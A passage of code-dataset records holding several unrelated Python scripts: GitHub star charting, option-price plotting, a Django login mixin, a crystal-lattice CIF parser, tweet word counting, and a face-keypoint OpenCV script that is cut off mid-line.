1000\n\nchart = pygal.Bar(style = my_style, show_legend = False)\nchart.title = 'Most starred projects in 2019-11'\nchart.x_labels = name\n\nchart.add('',starts)\npath = 'D://python_github.svg'\nchart.render_to_file(path)\nprint('Saved successfully! Saved at: ' + path)\n\n#resp_dict = resp_dicts[0]\n#print('\\nkeys:',len(resp_dict))\n#for key in sorted(resp_dict.keys()): # print some of the keys in resp_dict\n#    print(key)\n\n#print(response_dict.keys())\n#\n\n\n'''print('\\nselect information about first dict') # this prints the information returned by the API; pygal is used below for visualization\nfor resp_dict in resp_dicts:\n    print('\\nName:',resp_dict['name'])\n    print('stars:',resp_dict['stargazers_count'])\n    print('Owner:',resp_dict['owner']['login']) \n    print('Url:',resp_dict['html_url'])\n    print('Created:',resp_dict['created_at'])\n    print('Updated:',resp_dict['updated_at'])\n    print('Description:',resp_dict['description'])\n'''","sub_path":"(code)API_test.py","file_name":"(code)API_test.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"335191890","text":"\"\"\"\nVinícius Vilar - ADS UNIFIP - Programming 1 - List 2, Decision Structures\nPatos - PB | 2020\n\n6. 
Write a program that reads an integer value and computes its\nsquare.\n\n\"\"\"\n\nnum = int(input(\"Enter an integer: \"))\nnumElevado = num ** 2\n\nprint(\"{} squared is {}\".format(num, numElevado))\n","sub_path":"Lista 2 - FIP/Ex06.py","file_name":"Ex06.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652569569","text":"import os as os\nimport pandas as pd\nimport numpy as np\nimport csv\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\nfrom myReadSamples import *\nfrom mybb import *\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n#######################################################################################\n\nsavefig = False\ntest_mode = True\n\nyear_min = 2020\nyear_max = 2020\n\nmonth_min, day_min = 9, 1 # TIME WINDOW m%day, eg. 701, 1121\nmonth_max, day_max = 11, 13 # 10,30\n\n\n############ override below #####################\n#\nmySymbol = 'LYFT'\n#\n############ override below #####################\n\ndate_min = month_min*100 + day_min\ndate_max = month_max*100 + day_max\nx0min = 10000 * year_min + date_min\nx0max = 10000 * year_max + date_max\nx0minExp = x0min # Expiration date range\nx0maxExp = mydaylist2int( myintlist2day(x0max) + timedelta(15) ) #Contract with expiration 15 days after time window\n\nfilein = 'data3/'+mySymbol+'_bb.csv'\n\nbb_extract(mySymbol)\n######################\n\nmyStrikes = bb_get_Strikes(mySymbol)\nmyExpDates = bb_get_Exps(mySymbol)\nmyRights = ['P'] #,'P']\n\nprint(myRights)\nprint(myStrikes)\nprint(myExpDates)\n\n############ override below to narrow range #####################\n#\nmyStrikes = [26.5] #30.0] #340.0] #[26.0]\n#\n############ override below #####################\n\nnn = len(myExpDates)\nfor i in reversed(range(nn)):\n    for date in myExpDates:\n        if ((date < str(x0minExp)) | (date > str(x0maxExp))):\n            myExpDates.remove(date)\n#\nif(test_mode):\n    myStrikes = [myStrikes[0]]\n\n# dx0min = datetime.strptime(str(x0min), \"%Y%m%d\")\n# dx0max = datetime.strptime(str(x0max), \"%Y%m%d\")\n\nColors = ['Black', 'Red', 'Blue', 'Green', 'Cyan', 'Purple', 'Orange', 'Yellow']\n\nii = 0\n\ndf = pd.read_csv(filein, header=0)\ndf = df[(df['Date'] >= x0min) & (df['Date'] <= x0max) ]\ndf0 = df.copy()\ndf0.drop_duplicates(subset=\"Date\",keep=\"first\", inplace=True)\ndf0.reset_index(drop=True, inplace = True)\nstock = df0['UnderlyingPrice'].tolist()\nx2stock = df0['Date'].tolist()\n\nxx3 = list()\nyy3 = list()\nfor Right in myRights:\n    for Strike in myStrikes:\n        xx2 = list()\n        yy2 = list()\n        for Exp in myExpDates:\n            #print('Right', Right,Strike,Exp)\n            df2 = bb_read_data(df, gRight(Right), Strike, gExp(Exp))\n            if (df.empty):\n                break\n            df4 = df0.copy()\n            df4['Last'] = -999.\n            nn = df2.shape[0]\n            i = 0\n            for i in range(nn):\n                Date = df2['Date'].iloc[i]\n                j = df0[df4['Date'] == Date].index[0]\n                df4.iloc[j] = df2.iloc[i]\n            df2 = df4.copy()\n            y2 = df2['Last'].tolist()\n            for i in range(len(y2)):\n                if(y2[i] < 0.05 and y2[i] > -10.):\n                    y2[i] = np.NaN\n            x2 = df2['Date'].tolist()\n            x2 = list(map(str, x2))\n            xx2.append(x2)\n            yy2.append(y2)\n        n_tickdays = get_ntickdays(x2, 20, 5) # every 5 days, but maximum tick number is 20\n        plt.figure()\n        Title = mySymbol + ' OPT Price at Strike ' + str(Strike) + Right + ' for Various Exp Dates'\n        fig, (ax, ax2) = plt.subplots(2, 1, figsize=(10, 8), sharex=True)\n        #\n        ax = plt.subplot(211)\n        ymax = -9999.0\n        ymin = 9999.0\n        
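# find the shared y-axis maximum across all expiry series before plotting\n        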
for i in range(len(yy2)):\n ytemp = yy2[i].copy()\n #ytemp[np.array(ytemp) < 0] = np.NaN\n ymax = max([ymax,max(ytemp)])\n ymin = 0.0\n jj = 0 # number of lines in the OPT plot\n for Exp in myExpDates: # [0:3]:\n x2 = xx2[jj]\n y2 = yy2[jj]\n jj = jj+1\n n_tickdays = int(len(x2) / 20)\n n_tickdays = n_tickdays - (n_tickdays % 5)\n if (n_tickdays < 5):\n n_tickdays = 5\n if (n_tickdays > 20):\n n_tickdays = 20\n if (jj == 1):\n ax.scatter(x2, y2, color=Colors[jj], label='', marker='o', s=1) # to align the xlabels\n for i in range(len(y2)):\n if (y2[i] < 0.05):\n y2[i] = np.NaN\n ax.plot(x2, y2, color=Colors[jj % 7], label=Exp)\n ax.set(xlabel='Date', ylabel='Option, Price', title=Title)\n ax.xaxis.set_major_locator(ticker.MultipleLocator(n_tickdays))\n if (jj == 1):\n plt.draw()\n plt.setp(ax.get_xticklabels(), rotation=45)\n #\n cticks2 = ax.get_xticklabels()\n for i in range(len(cticks2)):\n a = cticks2[i].get_text()\n b = a[4:6] + '/' + a[6:8]\n if (i % 10 == 1):\n b = a[0:4] + '\\n' + b\n cticks2[i].set_text(b)\n ax.set_xticklabels(cticks2)\n plt.gca().yaxis.grid(True)\n plt.gca().xaxis.grid(True)\n ax.set_ylim(bottom=0, top=ymax) ############\n # ax.set_xlim(left=x0min, right=x0max) # 2+dtop)\n # ax.set_ybound(upper=ytop, lower=0.0)\n # ax.set_autoscale_on(False)\n plt.draw()\n plt.legend(loc='best')\n #\n ax2 = plt.subplot(212)\n y2 = stock\n x2 = x2stock\n x2 = list(map(str, x2))\n ax2.plot(x2, y2, color=Colors[5], label='STK')\n ax2.set(xlabel='Date', ylabel='STK, Price', title='STK')\n #\n ax2.xaxis.set_major_locator(ticker.MultipleLocator(n_tickdays))\n plt.draw()\n plt.setp(ax2.get_xticklabels(), rotation=45)\n cticks = ax2.get_xticklabels()\n for i in range(len(cticks)):\n a = cticks[i].get_text()\n b = a[4:6] + '/' + a[6:8]\n if (i % 10 == 1):\n b = a[0:4] + '\\n' + b\n cticks[i].set_text(b)\n ax2.set_xticklabels(cticks)\n plt.gca().yaxis.grid(True)\n plt.gca().xaxis.grid(True)\n # ax2.set_xlim(left=x0min, right=x0max )\n # ax2.set_autoscale_on(False)\n # #\n plt.legend(loc='best')\n #\n if (savefig):\n dir = 'figs/'+mySymbol\n if(os.path.exists(dir) == False):\n cmd = 'mkdir '+dir\n os.mkdir(dir)\n #\n savefile = 'figs/'+mySymbol+'/myplot'+'_'+ mySymbol+'_'+str(Strike)+Right+'.png'\n plt.savefig(savefile)\n print(' plot file saved as ', savefile)\n plt.show(block = False)\n plt.show()\n","sub_path":"plotOPT_bb.py","file_name":"plotOPT_bb.py","file_ext":"py","file_size_in_byte":6551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"147313155","text":"f = open(\"day1.txt\", \"r\")\r\ndata = f.read()\r\nlines = data.split('\\n')\r\n\r\nused_lines = filter(lambda line: len(line) > 0 and not line.isspace(), lines)\r\nexpenses = map(int, used_lines)\r\n\r\nfor i in range(0, len(expenses)):\r\n for j in range(i+1, len(expenses)):\r\n for k in range(j+1, len(expenses)):\r\n if expenses[i] + expenses[j] + expenses[k] == 2020:\r\n print(expenses[i] * expenses[j] * expenses[k])\r\n exit()\r\n\r\n","sub_path":"day1/day1_2.py","file_name":"day1_2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"126969795","text":"from django.conf import settings\nfrom django.contrib.auth import REDIRECT_FIELD_NAME\nfrom django.contrib.auth.views import redirect_to_login\nfrom django.core.exceptions import ImproperlyConfigured, PermissionDenied\n\n\nclass AccessMixin(object):\n \"\"\"\n 'Abstract' mixin that gives access mixins the same customizable\n 
functionality.\n \"\"\"\n login_url = settings.LOGIN_URL # LOGIN_URL from project settings\n raise_exception = False # Default whether to raise an exception to none\n redirect_field_name = REDIRECT_FIELD_NAME # Set by django.contrib.auth\n\n def get_login_url(self):\n \"\"\"\n Override this method to customize the login_url.\n \"\"\"\n if self.login_url is None:\n raise ImproperlyConfigured(\n \"%(cls)s is missing the login_url. \"\n \"Define %(cls)s.login_url or override \"\n \"%(cls)s.get_login_url().\" % {\"cls\": self.__class__.__name__})\n\n return self.login_url\n\n def get_redirect_field_name(self):\n \"\"\"\n Override this method to customize the redirect_field_name.\n \"\"\"\n if self.redirect_field_name is None:\n raise ImproperlyConfigured(\n \"%(cls)s is missing the \"\n \"redirect_field_name. Define %(cls)s.redirect_field_name or \"\n \"override %(cls)s.get_redirect_field_name().\" % {\n \"cls\": self.__class__.__name__\n })\n\n return self.redirect_field_name\n\n\nclass LoginRequiredMixin(AccessMixin):\n \"\"\"\n View mixin which verifies that the user is authenticated.\n\n NOTE:\n This should be the left-most mixin of a view.\n \"\"\"\n def dispatch(self, request, *args, **kwargs):\n if not request.user.is_authenticated():\n if self.raise_exception:\n raise PermissionDenied # return a forbidden response\n else:\n return redirect_to_login(\n request.get_full_path(),\n self.get_login_url(),\n self.get_redirect_field_name())\n\n return super(LoginRequiredMixin, self).dispatch(request, *args,\n **kwargs)\n","sub_path":"minions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"229565405","text":"'''\nMonte Carlo code\nwritten by: Thien-Phuc Tu-Nguyen\nLast modified: 2017\nFile: structure\n'''\n\nimport random\nimport numpy as np\nimport math\nfrom .atom import Atom\n\n# Class for Lattice\nclass Lattice:\n def __init__(self):\n self.atoms = []\n self.internal_atoms = []\n self.a = 0.0\n self.b = 0.0\n self.c = 0.0\n self.alpha = 0.0\n self.beta = 0.0\n self.gamma = 0.0\n self.volume = 0.0\n self.symmetry_x = []\n self.symmetry_y = []\n self.symmetry_z = []\n \n def init(self):\n k = math.pi/180.0 # radian conversion\n self.volume = self.a*self.b*self.c*math.sqrt(\n 1 - math.cos(k*self.alpha)**2- math.cos(k*self.beta)**2 - math.cos(k*self.gamma)**2\n + 2 * math.cos(k*self.alpha) * math.cos(k*self.beta) * math.cos(k*self.gamma))\n self.to_cartesian = np.zeros((3,3))\n self.to_cartesian[0,0] = self.a\n self.to_cartesian[0,1] = self.b*math.cos(k*self.gamma)\n self.to_cartesian[0,2] = self.c*math.cos(k*self.beta)\n self.to_cartesian[1,1] = self.b*math.sin(k*self.gamma)\n self.to_cartesian[1,2] = self.c*(math.cos(k*self.alpha)-math.cos(k*self.beta)*math.cos(k*self.gamma))/math.sin(k*self.gamma)\n self.to_cartesian[2,2] = self.volume / (self.a*self.b*math.sin(k*self.gamma))\n self.to_internal = np.linalg.inv(self.to_cartesian)\n # Generate the atoms coordinate\n temp = []\n for atom in self.internal_atoms:\n for i in range(len(self.symmetry_x)):\n x = atom.copy()\n x.x = eval(self.symmetry_x[i].replace('x',str(atom.x)).replace('y',str(atom.y)).replace('z',str(atom.z)))\n if x.x < 0:\n x.x += 1\n if x.x > 1:\n x.x -= 1\n x.y = eval(self.symmetry_y[i].replace('x',str(atom.x)).replace('y',str(atom.y)).replace('z',str(atom.z)))\n if x.y < 0:\n x.y += 1\n if x.y > 1:\n x.y -= 1\n x.z = 
eval(self.symmetry_z[i].replace('x',str(atom.x)).replace('y',str(atom.y)).replace('z',str(atom.z)))\n if x.z < 0:\n x.z += 1\n if x.z > 1:\n x.z -= 1\n temp.append(x)\n # Check the repetation in temp\n self.atoms = []\n for i in range(len(temp)-1,-1,-1):\n rep = False\n atom = temp[i]\n for j in range(i-1):\n r2 = (atom.x - temp[j].x)**2 + (atom.y - temp[j].y)**2 + (atom.z - temp[j].z)**2\n if r2 < 0.0001:\n rep = True\n break\n if not rep:\n self.atoms.append(atom)\n del temp[i]\n \n def read_cif(self,file_name):\n f = open(file_name,'r')\n temp = f.readline()\n n = 0\n while temp != '':\n if temp.find('_cell_length_a') != -1:\n self.a = float(temp.split()[1])\n if temp.find('_cell_length_b') != -1:\n self.b = float(temp.split()[1])\n if temp.find('_cell_length_c') != -1:\n self.c = float(temp.split()[1])\n if temp.find('_cell_angle_alpha') != -1:\n self.alpha = float(temp.split()[1])\n if temp.find('_cell_angle_beta') != -1:\n self.beta = float(temp.split()[1])\n if temp.find('_cell_angle_gamma') != -1:\n self.gamma = float(temp.split()[1])\n if temp.find('loop_') != -1:\n n += 1\n if n == 1:\n temp = f.readline()\n temp = f.readline()\n while temp != '\\n':\n tmp = temp[(temp.find(\"'\")+1):temp.rfind(\"'\")]\n tmp = tmp.split(',')\n self.symmetry_x.append(tmp[0])\n self.symmetry_y.append(tmp[1])\n self.symmetry_z.append(tmp[2])\n temp = f.readline()\n if n == 2:\n temp = f.readline()\n while temp[:1] == '_':\n temp = f.readline()\n while temp != '\\n':\n tmp = temp.split()\n atom = Atom()\n atom.a_type = tmp[0]\n atom.x = float(tmp[2])\n atom.y = float(tmp[3])\n atom.z = float(tmp[4])\n atom.charge = float(tmp[5])\n temp = f.readline()\n self.internal_atoms.append(atom)\n temp = f.readline()\n f.close()\n \n def check(self,atom):\n coord = [atom.x,atom.y,atom.z]\n new_coord = np.dot(self.to_internal,coord)\n for i in range(3):\n while new_coord[i] < 0:\n new_coord[i] += 1\n while new_coord[i] > 1:\n new_coord[i] -= 1\n new_coord = np.dot(self.to_cartesian,new_coord)\n atom.x = new_coord[0]\n atom.y = new_coord[1]\n atom.z = new_coord[2]\n \n def shortest_r2(self,a,b):\n dx = a.x - b.x\n dy = a.y - b.y\n dz = a.z - b.z\n if dx > self.a/2:\n dx -= self.a/2\n if dx < - self.a/2:\n dx += self.a/2\n if dy > self.b/2:\n dy -= self.b/2\n if dy < - self.b/2:\n dy += self.b/2\n if dz > self.c/2:\n dz -= self.c/2\n if dz < - self.c/2:\n dz += self.c/2\n return dx**2 + dy**2 + dz**2\n\n# Class for adsorbents in lattice box\nclass Adsorbent:\n def __init__(self):\n self.atoms = []\n \n def copy_lattice(self,lattice):\n self.a = lattice.a\n self.b = lattice.b\n self.c = lattice.c\n self.alpha = lattice.alpha\n self.beta = lattice.beta\n self.gamma = lattice.gamma\n self.volume = lattice.volume\n self.to_cartesian = lattice.to_cartesian # Copy reference\n self.to_internal = lattice.to_internal # Copy reference\n \n def check(self,atom):\n coord = [atom.x,atom.y,atom.z]\n new_coord = np.dot(self.to_internal,coord)\n for i in range(3):\n if new_coord[i] < 0:\n new_coord[i] += 1\n if new_coord[i] > 1:\n new_coord[i] -= 1\n new_coord = np.dot(self.to_cartesian,new_coord)\n atom.x = new_coord[0]\n atom.y = new_coord[1]\n atom.z = new_coord[2]\n\n def shortest_r2(self,a,b):\n dx = a.x - b.x\n dy = a.y - b.y\n dz = a.z - b.z\n if dx > self.a/2:\n dx -= self.a/2\n if dx < - self.a/2:\n dx += self.a/2\n if dy > self.b/2:\n dy -= self.b/2\n if dy < - self.b/2:\n dy += self.b/2\n if dz > self.c/2:\n dz -= self.c/2\n if dz < - self.c/2:\n dz += self.c/2\n return dx**2 + dy**2 + dz**2\n\n# Lattice for adsorbent 
in another box\nclass Box:\n def __init__(self):\n self.atoms = []\n self.side = 0.0\n self.volume = 0.0\n \n def init(self, side, n_particle):\n self.side = side\n self.volume = side ** 3\n \n \n def check(self,atom):\n while atom.x > self.side:\n atom.x -= self.side\n while atom.x < 0:\n atom.x += self.side\n while atom.y > self.side:\n atom.y -= self.side\n while atom.y < 0:\n atom.y += self.side\n while atom.z > self.side:\n atom.z -= self.side\n while atom.z < 0:\n atom.z += self.side\n \n def shortest_r2(self, a, b):\n '''Return the shortest distance of two atom with'''\n dx = a.x - b.x\n dy = a.y - b.y\n dz = a.z - b.z\n if dx > self.side/2:\n dx -= self.side/2\n if dx < - self.side/2:\n dx += self.side/2\n if dy > self.side/2:\n dy -= self.side/2\n if dy < - self.side/2:\n dy += self.side/2\n if dz > self.side/2:\n dz -= self.side/2\n if dz < - self.side/2:\n dz += self.side/2\n return dx**2 + dy**2 + dz**2\n","sub_path":"ptmonte/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346971357","text":"import nltk\nimport nltk.corpus \nimport string\nimport re\nimport csv\nimport time\nimport os, sys, codecs\nfrom nltk.text import Text\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom nltk.stem import WordNetLemmatizer \n\nstart = time.time() \nlemmatizer = WordNetLemmatizer() \n\ntweet = TweetTokenizer(strip_handles=True)\n# Setting Stopwords\nstop_words = set(stopwords.words('english'))\n# Updating stop words with punctuation\nstop_words.update(['.', ',', '\"', \"'\", '?', '!', ':', ';', '(', ')', '[', ']', '{', '}','/', '-','~','&','*','<','>','=','%'])\n# updating stopwords with links\nstop_words.update(['http','httpbitly','httptinyurl','://'])\n# updating stopwords with Expressions and words of no impact\nstop_words.update(['่','ã€','ã€','。','ã€','é','|','ï¼','…','’','่','^',',',')','้','ั','#p2','。','’','#tcot','ั','ã€','่','via','、'])\n# updating stopwords with Contractions\nstop_words.update([\"i've\",\"that's\",\"can't\", \"i'll\", \"i'm\",'que',\"i'm\",'your',\"you're\",\"i'd\",\"i'm\"])\n# updating stopwords with Digits\nstop_words.update(['0','1','2','3','4','5','6','7','8','9','10','0'])\n# updating stopwords with Bot Words\nstop_words.update(['handsome','Mystery','Sexy','Best','Free','Cute','Avaiable','attractive','free','sexy','hot','win','avaiable','cute',])\n\n\n\n\n\nDATA_PATH = 'Thesis\\\\Files\\\\'\nlemmatizer = WordNetLemmatizer()\n# file_name = 'RiskTweets.txt'\n\nfile_name = '../Files/RiskTweets.txt'\n\nPOSITIVES = set()\nNEGATIVES = set()\n\ndef remove_bom_inplace(filepath):\n \"\"\"Removes BOM mark, if it exists, from a file and rewrites it in-place\"\"\"\n buffer_size = 4096\n bom_length = len(codecs.BOM_UTF8)\n \n with open(filepath, \"r+b\") as fp:\n chunk = fp.read(buffer_size)\n if chunk.startswith(codecs.BOM_UTF8):\n i = 0\n chunk = chunk[bom_length:]\n while chunk:\n fp.seek(i)\n fp.write(chunk)\n i += len(chunk)\n fp.seek(bom_length, os.SEEK_CUR)\n chunk = fp.read(buffer_size)\n fp.seek(-bom_length, os.SEEK_CUR)\n fp.truncate()\n\n\ndef directorySkip(s=DATA_PATH):\n\tpath = os.path.dirname(os.path.abspath(__file__))\n\tif type(path) == str:\n\t\ti,j = len(path),0\n\t\twhile (j!=2):\n\t\t\ti = i-1\n\t\t\tif path[i] == '\\\\':\n\t\t\t\tj = j + 1\n\t\treturn path[0:i+1] + s\n\treturn None\n\ndef getDataPath(s, endtag='.txt'):\n\tpath = directorySkip() + s + 
endtag\n\treturn path\n\ndef loadFile(s, endtag='.txt'):\n\tlist = []\n\twith open(getDataPath(s, endtag=endtag), \"r\") as file:\n\t\tfor line in file:\n\t\t\tlist.append(line.replace('\\n', ''))\n\treturn list\n\nPOSITIVES = set(loadFile(\"positives\"))\nNEGATIVES = set(loadFile(\"negatives\"))\n\n# def get_emotwordlist(filepath):\n # with open(filepath, 'r', encoding=\"utf8\",errors='ignore') as f:\n # emotwordlist = [word.strip().lower() for word in f.read().split('\\n') if len(word.strip()) > 1]\n # print(*emotwordlist)\n # return emotwordlist\n\ndef alter_prolonged(list):\n\tlemmatizer = WordNetLemmatizer()\n\tres = list.copy()\n\tfor v in range(len(list)):\n\t\ti = 0\n\t\tj = -1\n\t\tw = list[v]\n\t\twhile(i + 2 < len(w)):\n\t\t\tif (w[i] == w[i+1] and w[i+1] == w[i+2]):\n\t\t\t\tw = w[:i] + w[(i+1):]\n\t\t\t\tj = i\n\t\t\telse:\n\t\t\t\ti+= 1\n\t\tif (not (w in POSITIVES or w in NEGATIVES)) and j != -1:\n\t\t\tw = w[:j] + w[(j+1):]\n\t\ttry:\n\t\t\tres[v] = lemmatizer.lemmatize(w)\n\t\texcept:\n\t\t\tprint(\"Could not lemmatize word '\" + w + \"'\")\n\t\t\tres[v] = w\n\t\t\tpass\n\treturn res\n\n\nwith open(file_name, 'r', encoding=\"utf8\",errors='ignore') as f:\n text = f.read()\n # remove punctuation from each word (What's -> Whats)\n list_of_words = [i.lower() for i in tweet.tokenize(text) if i.lower() not in stop_words]\n\n list_of_words = alter_prolonged(list_of_words)\n\n global wordcount\n\n wordcount = (len(list_of_words))\n\n fdist = Counter(list_of_words)\n\n dist = fdist.most_common(10000)\n\n RiskWords = '../Output/Risk/RiskWords.csv'\n\n with open(RiskWords, 'w', encoding=\"utf8\",errors='ignore') as csvFile:\n \tcsv_out = csv.writer(csvFile, delimiter=\",\", lineterminator=\"\\r\\n\")\n \tcsv_out.writerow(['Name','Count'])\n \tfor row in dist:\n \t\t csv_out.writerow(row)\n\n with open('../Output/Risk/RiskWords.txt', 'w', encoding=\"utf8\",errors='ignore') as File:\n \tFile.write(('\\n'.join('%s %s' % x for x in dist)))\n\n # emotword_set = set(get_emotwordlist('EmotionalWords.txt'))\n emotword_set = NEGATIVES\n emot_fdist = Counter()\n\n # filtering non emotional words\n for word in emotword_set:\n if word in fdist:\n emot_fdist[word] = fdist[word]\n \n\n\n\n dist = emot_fdist.most_common(10000)\n\n RiskNegatives = '../Output/Risk/RiskNegatives.csv'\n\n # rt = retweet\n with open(RiskNegatives, 'w', encoding=\"utf8\",errors='ignore') as csvFile:\n \tcsv_out = csv.writer(csvFile, delimiter=\",\", lineterminator=\"\\r\\n\")\n \tcsv_out.writerow(['Name','Count'])\n \tfor row in dist:\n \t\t csv_out.writerow(row)\n \t\t # rt = retweet \n\n with open('../Output/Risk/RiskNegatives.txt', 'w', encoding=\"utf8\",errors='ignore') as File:\n \tFile.write(('\\n'.join('%s %s' % x for x in dist)))\n\n \n # emotword_set = set(get_emotwordlist('EmotionalWords.txt'))\n emotword_set = POSITIVES\n emot_fdist = Counter()\n\n # filtering non emotional words\n for word in emotword_set:\n if word in fdist:\n emot_fdist[word] = fdist[word] \n\n\n\n dist = emot_fdist.most_common(10000)\n\n RiskPositives = '../Output/Risk/RiskPositives.csv'\n\n# rt = retweet\n with open(RiskPositives, 'w', encoding=\"utf8\",errors='ignore') as csvFile:\n \tcsv_out = csv.writer(csvFile, delimiter=\",\", lineterminator=\"\\r\\n\")\n \tcsv_out.writerow(['Name','Count'])\n \tfor row in dist:\n \t\t csv_out.writerow(row)\n\n\n# rt = retweet \n with open('../Output/Risk/RiskPositives.txt', 'w', encoding=\"utf8\",errors='ignore') as File:\n \tFile.write(('\\n'.join('%s %s' % x for x in 
dist)))\n\n\n\n\nremove_bom_inplace('../Output/Risk/RiskNegatives.csv')\nremove_bom_inplace('../Output/Risk/RiskPositives.csv')\nremove_bom_inplace('../Output/Risk/RiskWords.csv')\n\n\nend = time.time()\nseconds = (end - start)\nminutes = (seconds/60)\nprint(\"RiskFreq Script Done\")\nprint(\"This Script took \" + str(minutes) + \" minutes to run\")\nprint(\"The Text Corpus Contains \" + str(wordcount) + \" Words\")\n","sub_path":"Tools/RiskFreq.py","file_name":"RiskFreq.py","file_ext":"py","file_size_in_byte":6393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"451344666","text":"import csv\n\ndef stations(stations_csv):\n    \"\"\"returns list of all stations with corresponding coordinates\"\"\"\n\n    # create empty list\n    stations = list()\n\n    # open csv file with stations\n    with open (stations_csv) as file_stations:\n\n        # read csv file and return list of columns\n        read_stations = csv.DictReader(file_stations)\n\n        # iterate over rows and append to list\n        for row in read_stations:\n            stations.append(row)\n\n    return stations\n\ndef railroads(railroads_csv):\n    \"\"\"returns list of all railroads between stations\"\"\"\n\n    # create empty list\n    railroads = list()\n\n    # open csv file with connections\n    with open (railroads_csv) as file_railroads:\n\n        # read csv file and return list of columns\n        read_railroads = csv.DictReader(file_railroads)\n\n        # iterate over rows and append to list\n        for row in read_railroads:\n            railroads.append(row)\n\n    return railroads\n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430645582","text":"\n'''\n\nThis file contains the OpenCV code necessary to do real-time face swapping. 
The page\nopens up the camera stream and user access point.\n\n'''\n\nimport numpy as np\nimport cv2\n\nfrom tensorflow.python.keras.models import load_model\n\nfrom PIL import Image\n\nfrom face_detector_utils import *\n\n# Face cascade to detect faces\nface_cascade = cv2.CascadeClassifier('assets/cascades/haarcascade_frontalface_default.xml')\n\n# This function is used to return a face image\ndef get_face_original (frame, spec):\n \n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.25, 6)\n\n for (x, y, w, h) in faces:\n\n # Grab the face\n gray_face = gray[y:y+h, x:x+w]\n color_face = frame[y:y+h, x:x+w]\n \n if (spec == \"color\"):\n return color_face\n else:\n return gray_face\n\n# This function is used to determine a face based on a cv frame\ndef extract_face (frame):\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.25, 6)\n\n for (x, y, w, h) in faces:\n\n # Grab the face\n gray_face = gray[y:y+h, x:x+w]\n color_face = frame[y:y+h, x:x+w]\n\n # Normalize to match the input format of the model - Range of pixel to [0, 1]\n gray_normalized = gray_face / 255\n\n # Resize it to 96x96 to match the input format of the model\n original_shape = gray_face.shape # A Copy for future reference\n face_resized = cv2.resize(gray_normalized, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_copy = face_resized.copy()\n face_resized = face_resized.reshape(1, 96, 96, 1)\n\n # Predicting the keypoints using the model\n keypoints = model.predict(face_resized)\n\n # De-Normalize the keypoints values\n keypoints = keypoints * 48 + 48\n\n # Map the Keypoints back to the original image\n face_resized_color = cv2.resize(color_face, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_color2 = np.copy(face_resized_color)\n\n # Pair them together\n points = []\n for i, co in enumerate(keypoints[0][0::2]):\n points.append((co, keypoints[0][1::2][i]))\n\n # Add KEYPOINTS to the frame2\n for keypoint in points:\n cv2.circle(face_resized_color2, keypoint, 1, (0,255,0), 1)\n\n frame[y:y+h, x:x+w] = cv2.resize(face_resized_color2, original_shape, interpolation = cv2.INTER_CUBIC)\n\n # Show the frame and the overlay (cascade)\n cv2.imshow(\"Facial Keypoints\", frame)\n \n return frame\n\n# This function returns the list of key facial detection key points\ndef extract_facial_features (frame):\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.25, 6)\n\n # 2D list used to store the x and y coordinates of all the facial landmarks (converted to contours later)\n points = []\n\n for (x, y, w, h) in faces:\n\n # Grab the face\n gray_face = gray[y:y+h, x:x+w]\n color_face = frame[y:y+h, x:x+w]\n\n # Normalize to match the input format of the model - Range of pixel to [0, 1]\n gray_normalized = gray_face / 255\n\n # Resize it to 96x96 to match the input format of the model\n original_shape = gray_face.shape # A Copy for future reference\n face_resized = cv2.resize(gray_normalized, (96, 96), interpolation = cv2.INTER_AREA)\n face_resized_copy = face_resized.copy()\n face_resized = face_resized.reshape(1, 96, 96, 1)\n\n # Predicting the keypoints using the model\n keypoints = model.predict(face_resized)\n\n # De-Normalize the keypoints values\n keypoints = keypoints * 48 + 48\n\n 
# Map the Keypoints back to the original image\n        face_resized_color = cv2.resize(color_face, (96, 96), interpolation = cv2.INTER_AREA)\n        face_resized_color2 = np.copy(face_resized_color)\n\n        # Pair them together\n        for i, co in enumerate(keypoints[0][0::2]):\n            points.append((co, keypoints[0][1::2][i]))\n\n    return points\n\n# The file paths for the CNN custom facial recognition model and source image (layered on top of destination image)\nmodel = load_model('FaceRecognition_CNN.h5')\nsrc_img_path = 'assets/images/al_gore.jpg'\n\n# Read the source image\nsrc_img = cv2.imread(src_img_path)\n\n# Save a copy of the original image\nsrc_img_original = get_face_original(src_img, spec=\"color\")\n\n# Resize the source image for mapping\nsrc_img = cv2.resize(src_img_original, (96, 96), interpolation = cv2.INTER_AREA)\n\n# Detect the face from the source image and display it\nsrc_img_detection = extract_face(src_img)\ncv2.waitKey(0)\n\n# Draw the facial contours over the original face\nsrc_img_hull = extract_facial_features(src_img)\nsrc_img_hull = np.array(src_img_hull)\nsrc_img_hull = 